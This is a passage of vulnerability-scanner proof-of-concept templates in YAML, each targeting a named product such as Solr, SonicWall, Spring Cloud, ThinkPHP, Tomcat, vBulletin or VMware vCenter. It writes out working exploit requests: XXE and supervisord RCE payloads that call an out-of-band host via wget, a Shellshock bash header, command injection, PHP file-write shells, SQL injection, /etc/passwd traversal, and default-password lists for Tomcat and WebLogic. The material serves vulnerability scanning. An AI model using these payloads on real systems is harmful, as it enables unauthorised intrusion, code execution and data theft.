| set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: GET 7 | path: "/solr/admin/cores?wt=json" 8 | 
expression: "true" 9 | search: | 10 | "name":"(?P[^"]+)", 11 | - method: GET 12 | path: /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22{{reverseURL}}%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser 13 | follow_redirects: true 14 | expression: | 15 | reverse.wait(5) 16 | detail: 17 | author: sharecast 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/sonarqube-cve-2020-27986-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonarqube-cve-2020-27986-unauth 2 | rules: 3 | - method: GET 4 | path: "/api/settings/values" 5 | expression: | 6 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id"))) 7 | detail: 8 | author: pa55w0rd(www.pa55w0rd.online/) 9 | Affected Version: "sonarqube < 8.4.2.36762" 10 | links: 11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-27986 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/sonicwall-ssl-vpn-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sonicwall-ssl-vpn-rce 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(1140000, 1144800) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/jarrewrite.sh 8 | follow_redirects: false 9 | headers: 10 | X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) 13 | detail: 14 | author: sharecast 15 | links: 16 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ 17 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/spark-api-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-api-unauth 2 | rules: 3 | - method: GET 4 | path: /v1/submissions 5 | expression: | 6 | response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 7 | detail: 8 | author: betta(https://github.com/betta-cyber) 9 | links: 10 | - https://xz.aliyun.com/t/2490 11 | -------------------------------------------------------------------------------- /src/plugins/pocs/spark-webui-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spark-webui-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | expression: response.status == 200 && response.body.bcontains(b"Spark") && response.body.bcontains(b"<strong>URL:</strong> spark:") 6 | detail: 7 | links: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc -------------------------------------------------------------------------------- /src/plugins/pocs/spon-ip-intercom-ping-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spon-ip-intercom-ping-rce 2 | set: 3 | r1: randomLowercase(10) 4 | r2: randomLowercase(10) 5 | r3: randomLowercase(10) 6 | r4: randomLowercase(10) 7 | rules: 8 | - method: POST 9 | path: /php/ping.php 10 | headers: 11 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 12 | body: | 13 | jsondata[ip]=%7C echo {{r1}}${{{r2}}}{{r3}}^{{r4}}&jsondata[type]=0 14 | expression: response.status == 200 && (response.body.bcontains(bytes(r1 + r3 + "^" + r4)) || response.body.bcontains(bytes(r1 + "${" + r2 + "}" + r3 + r4))) 15 | 16 | detail: 17 | author: york 18 | links: 19 | - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9 20 | 
-------------------------------------------------------------------------------- /src/plugins/pocs/spring-actuator-heapdump-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-actuator-heapdump-file 2 | rules: 3 | - method: HEAD 4 | path: /actuator/heapdump 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.content_type.contains("application/octet-stream") 8 | detail: 9 | author: AgeloVito 10 | info: spring-actuator-heapdump-file 11 | links: 12 | - https://www.cnblogs.com/wyb628/p/8567610.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/spring-cloud-cve-2020-5405.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5405 2 | rules: 3 | - method: GET 4 | path: >- 5 | /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). 
Do not edit.")) 9 | 10 | detail: 11 | version: <= 2.1.6, 2.2.1 12 | author: kingkk(https://www.kingkk.com/) 13 | links: 14 | - https://pivotal.io/security/cve-2020-5405 15 | - https://github.com/spring-cloud/spring-cloud-config -------------------------------------------------------------------------------- /src/plugins/pocs/spring-cloud-cve-2020-5410.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cloud-cve-2020-5410 2 | rules: 3 | - method: GET 4 | path: >- 5 | /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | author: Soveless(https://github.com/Soveless) 10 | Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" 11 | links: 12 | - https://xz.aliyun.com/t/7877 -------------------------------------------------------------------------------- /src/plugins/pocs/spring-cve-2016-4977.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-spring-cve-2016-4977 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: GET 7 | path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test 8 | follow_redirects: false 9 | expression: > 10 | response.body.bcontains(bytes(string(r1 * r2))) 11 | detail: 12 | Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" 13 | author: hanxiansheng26(https://github.com/hanxiansheng26) 14 | links: 15 | - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/springboot-env-unauth.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springboot-env-unauth 2 | groups: 3 | spring1: 4 | - method: GET 5 | path: /env 6 | 
expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 8 | spring2: 9 | - method: GET 10 | path: /actuator/env 11 | expression: | 12 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") 13 | detail: 14 | links: 15 | - https://github.com/LandGrey/SpringBootVulExploit 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/springcloud-cve-2019-3799.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-springcloud-cve-2019-3799 2 | rules: 3 | - method: GET 4 | path: >- 5 | /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 9 | 10 | detail: 11 | version: <2.1.2, 2.0.4, 1.4.6 12 | author: Loneyer 13 | links: 14 | - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/sql-file.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-sql-file 2 | set: 3 | host: request.url.domain 4 | sets: 5 | path: 6 | - "1.sql" 7 | - "backup.sql" 8 | - "database.sql" 9 | - "data.sql" 10 | - "db_backup.sql" 11 | - "dbdump.sql" 12 | - "db.sql" 13 | - "dump.sql" 14 | - "{{host}}.sql" 15 | - "{{host}}_db.sql" 16 | - "localhost.sql" 17 | - "mysqldump.sql" 18 | - "mysql.sql" 19 | - "site.sql" 20 | - "sql.sql" 21 | - "temp.sql" 22 | - "translate.sql" 23 | - "users.sql" 24 | rules: 25 | - method: GET 26 | path: /{{path}} 27 | follow_redirects: false 28 | continue: true 29 | expression: | 30 | "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO".bmatches(response.body) 31 | detail: 
32 | author: shadown1ng(https://github.com/shadown1ng) 33 | -------------------------------------------------------------------------------- /src/plugins/pocs/supervisord-cve-2017-11610.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-supervisord-cve-2017-11610 2 | set: 3 | reverse: newReverse() 4 | reverseURL: reverse.url 5 | rules: 6 | - method: POST 7 | path: /RPC2 8 | body: >- 9 | <?xml version="1.0"?> 10 | <methodCall> 11 | <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> 12 | <params> 13 | <param> 14 | <string>wget {{reverseURL}}</string> 15 | </param> 16 | </params> 17 | </methodCall> 18 | follow_redirects: false 19 | expression: | 20 | response.status == 200 && reverse.wait(5) 21 | detail: 22 | author: Loneyer 23 | links: 24 | - https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610 25 | -------------------------------------------------------------------------------- /src/plugins/pocs/tamronos-iptv-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tamronos-iptv-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /api/ping?count=5&host=;echo%20$(expr%20{{r1}}%20%2b%20{{r2}}):{{r1}}:{{r1}};&port=80&source=1.1.1.1&type=icmp 8 | follow_redirects: false 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) 11 | detail: 12 | author: Print1n 13 | description: TamronOS IPTV系统存在前台命令执行漏洞 14 | links: 15 | - https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/tensorboard-unauth.yml: -------------------------------------------------------------------------------- 1 | name: 
poc-yaml-tensorboard-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"The TensorFlow Authors. All Rights Reserved.") 8 | - method: GET 9 | path: '/data/plugins_listing' 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"profile") && response.body.bcontains(b"distributions") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://www.tensorflow.org/guide/summaries_and_tensorboard?hl=zh-CN 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/terramaster-cve-2020-15568.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-cve-2020-15568 2 | set: 3 | r1: randomLowercase(10) 4 | r2: randomInt(800000000, 1000000000) 5 | r3: randomInt(800000000, 1000000000) 6 | rules: 7 | - method: GET 8 | path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20{{r2}}%20%2B%20{{r3}})%3E{{r1}} 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /include/{{r1}} 14 | expression: | 15 | response.status == 200 && response.body.bcontains(bytes(string(r2 + r3))) 16 | detail: 17 | author: albertchang 18 | Affected Version: "TOS version 4.1.24 and below" 19 | links: 20 | - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/terramaster-tos-rce-cve-2020-28188.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-tos-rce-cve-2020-28188 2 | set: 3 | r1: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: 
/include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r1}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r1}}.php%20&&%20chmod%20755%20/usr/www/{{r1}}.php|| 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime")) 10 | - method: GET 11 | path: /{{r1}}.php 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && response.body.bcontains(bytes(md5(r1))) 15 | detail: 16 | author: Print1n 17 | links: 18 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkadmin-v6-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkadmin-v6-readfile 2 | rules: 3 | - method: GET 4 | path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) 8 | detail: 9 | author: 0x_zmz(github.com/0x-zmz) 10 | info: thinkadmin-v6-readfile By 0x_zmz 11 | links: 12 | - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw 13 | - https://github.com/0x-zmz 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | 3 | rules: 4 | - method: GET 5 | path: "/?a=display&templateFile=README.md" 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 8 | 9 | detail: 10 | author: JerryKing 11 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 12 | links: 13 | - 
https://www.freebuf.com/vuls/217586.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkcmf-write-shell.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-write-shell 2 | set: 3 | r: randomInt(10000, 20000) 4 | r1: randomInt(1000000000, 2000000000) 5 | rules: 6 | - method: GET 7 | path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" 8 | expression: "true" 9 | - method: GET 10 | path: "/{{r}}.php" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1))) 13 | 14 | detail: 15 | author: violin 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | links: 18 | - https://www.freebuf.com/vuls/217586.html 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkphp-v6-file-write.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp-v6-file-write 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: GET 6 | path: /{{f1}}.php 7 | follow_redirects: true 8 | expression: | 9 | response.status == 404 10 | - method: GET 11 | path: / 12 | headers: 13 | Cookie: PHPSESSID=../../../../public/{{f1}}.php 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) 17 | - method: GET 18 | path: /{{f1}}.php 19 | follow_redirects: true 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/html") 22 | detail: 23 | author: Loneyer 24 | Affected Version: "Thinkphp 6.0.0" 25 | links: 26 | - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write 27 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkphp5-controller-rce.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | rules: 3 | - method: GET 4 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 5 | expression: | 6 | response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 7 | 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce -------------------------------------------------------------------------------- /src/plugins/pocs/tianqing-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tianqing-info-leak 2 | rules: 3 | - method: GET 4 | path: /api/dbstat/gettablessize 5 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") 6 | detail: 7 | author: jingling(https://github.com/shmilylty) 8 | links: 9 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 10 | -------------------------------------------------------------------------------- /src/plugins/pocs/tomcat-cve-2017-12615-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2017-12615-rce 2 | set: 3 | filename: randomLowercase(6) 4 | verifyStr: randomLowercase(12) 5 | commentStr: randomLowercase(12) 6 | rules: 7 | - method: PUT 8 | path: '/{(unknown)}.jsp/' 9 | body: '{{verifyStr}} <%-- {{commentStr}} --%>' 10 | follow_redirects: false 11 | expression: | 12 | response.status == 201 13 | - method: GET 14 | path: '/{(unknown)}.jsp' 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) 18 | detail: 19 | author: j4ckzh0u(https://github.com/j4ckzh0u) 20 | links: 21 | - https://www.seebug.org/vuldb/ssvid-96562 22 | 
- https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA 23 | -------------------------------------------------------------------------------- /src/plugins/pocs/tomcat-cve-2018-11759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2018-11759 2 | rules: 3 | - method: GET 4 | path: /jkstatus; 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) 8 | - method: GET 9 | path: /jkstatus;?cmd=dump 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && "ServerRoot=*".bmatches(response.body) 13 | detail: 14 | author: loneyer 15 | links: 16 | - https://github.com/immunIT/CVE-2018-11759 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/tomcat-manager-weak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-manager-weak 2 | sets: 3 | username: 4 | - tomcat 5 | - admin 6 | - root 7 | - manager 8 | password: 9 | - tomcat 10 | - "" 11 | - admin 12 | - 123456 13 | - root 14 | payload: 15 | - base64(username+":"+password) 16 | rules: 17 | - method: GET 18 | path: /manager/html 19 | follow_redirects: false 20 | expression: | 21 | response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") 22 | - method: GET 23 | path: /manager/html 24 | headers: 25 | Authorization: Basic {{payload}} 26 | follow_redirects: false 27 | expression: | 28 | response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") 29 | detail: 30 | author: shadown1ng(https://github.com/shadown1ng) 31 | 32 | -------------------------------------------------------------------------------- /src/plugins/pocs/tongda-meeting-unauthorized-access.yml: 
-------------------------------------------------------------------------------- 1 | name: poc-yaml-tongda-meeting-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: >- 5 | /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) 9 | detail: 10 | author: 清风明月(www.secbook.info) 11 | influence_version: ' < 通达OA 11.5' 12 | links: 13 | - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/tongda-user-session-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: tongda-user-session-disclosure 2 | rules: 3 | - method: GET 4 | path: /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 5 | expression: response.body.bcontains(b'RELOGIN') && response.status == 200 6 | detail: 7 | author: kzaopa(https://github.com/kzaopa) 8 | description: | 9 | 通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统 10 | links: 11 | - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html 12 | - https://www.cnblogs.com/T0uch/p/14475551.html 13 | - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/tpshop-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /index.php/Home/uploadify/fileList?type=.+&path=../ 5 | headers: 6 
| Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("\"state\":\"SUCCESS\""))) && response.body.bcontains(bytes(string("total"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: 'TPshop' 13 | links: 14 | - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA 15 | - http://www.tp-shop.cn 16 | exploit: 17 | - https://localhost/index.php/Home/uploadify/fileList?type=.+&path=../../ 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/tpshop-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5({{r}})),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 8 | follow_redirects: true 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | Affected Version: "tpshop<3.0" 14 | links: 15 | - https://xz.aliyun.com/t/6635 -------------------------------------------------------------------------------- /src/plugins/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /Pages/login.htm 7 | expression: response.status == 200 && response.body.bcontains(b"<title>NVMS-1000") 8 | 9 | - method: GET 10 | path: /../../../../../../../../../../../../windows/win.ini 11 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 12 | 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - 
https://www.exploit-db.com/exploits/47774 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/ueditor-cnvd-2017-20077-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ueditor-cnvd-2017-20077-file-upload 2 | rules: 3 | - method: GET 4 | path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: 'UEditor v1.4.3.3' 13 | links: 14 | - https://zhuanlan.zhihu.com/p/85265552 15 | - https://www.freebuf.com/vuls/181814.html 16 | exploit: >- 17 | http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | rules: 3 | - method: GET 4 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 -------------------------------------------------------------------------------- /src/plugins/pocs/vbulletin-cve-2019-16759-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759-bypass 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: POST 6 | path: /ajax/render/widget_tabbedcontainer_tab_panel 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | 
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}})); 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json") 14 | detail: 15 | author: Loneyer 16 | links: 17 | - https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/vbulletin-cve-2019-16759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: / 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({{rand}}))%3bexit%3b 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(rand)))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | vbulletion_version: 5.0.0 - 5.5.4 17 | links: 18 | - https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.html 19 | - https://xz.aliyun.com/t/6419 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/vmware-vcenter-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vcenter-arbitrary-file-read 2 | groups: 3 | win: 4 | - method: GET 5 | path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") 9 | linux: 10 | - method: GET 11 | path: /eam/vib?id=/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 
| detail: 16 | author: MrP01ntSun(https://github.com/MrPointSun) 17 | links: 18 | - https://t.co/LfvbyBUhF5 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 2 | rules: 3 | - method: GET 4 | path: /ui/vropspluginui/rest/services/uploadova 5 | follow_redirects: false 6 | expression: | 7 | response.status == 405 && response.body.bcontains(b"Method Not Allowed") 8 | - method: GET 9 | path: /ui/vropspluginui/rest/services/getstatus 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://swarm.ptsecurity.com/unauth-rce-vmware/ -------------------------------------------------------------------------------- /src/plugins/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf 2 | rules: 3 | - method: POST 4 | path: /casa/nodes/thumbprints 5 | headers: 6 | Content-Type: application/json 7 | body: | 8 | ["127.0.0.1:443/ui/"] 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) 12 | detail: 13 | author: Loneyer 14 | links: 15 | - https://www.vmware.com/security/advisories/VMSA-2021-0004.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/weaver-E-Cology-getSqlData-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weaver-E-Cology-getSqlData-sqli 2 | rules: 3 | - method: GET 4 | path: 
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b'Microsoft SQL Server') 8 | 9 | detail: 10 | author: PeiQi0 11 | links: 12 | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md 13 | tags: weaver,sqli 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/weblogic-console-weak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-console-weak 2 | sets: 3 | username: 4 | - weblogic 5 | password: 6 | - weblogic 7 | - weblogic1 8 | - welcome1 9 | - Oracle@123 10 | - weblogic123 11 | payload: 12 | - UTF-8 13 | rules: 14 | - method: HEAD 15 | path: /console/j_security_check 16 | follow_redirects: false 17 | expression: | 18 | response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION") 19 | - method: POST 20 | path: /console/j_security_check 21 | follow_redirects: false 22 | headers: 23 | Content-type: application/x-www-form-urlencoded 24 | body: | 25 | 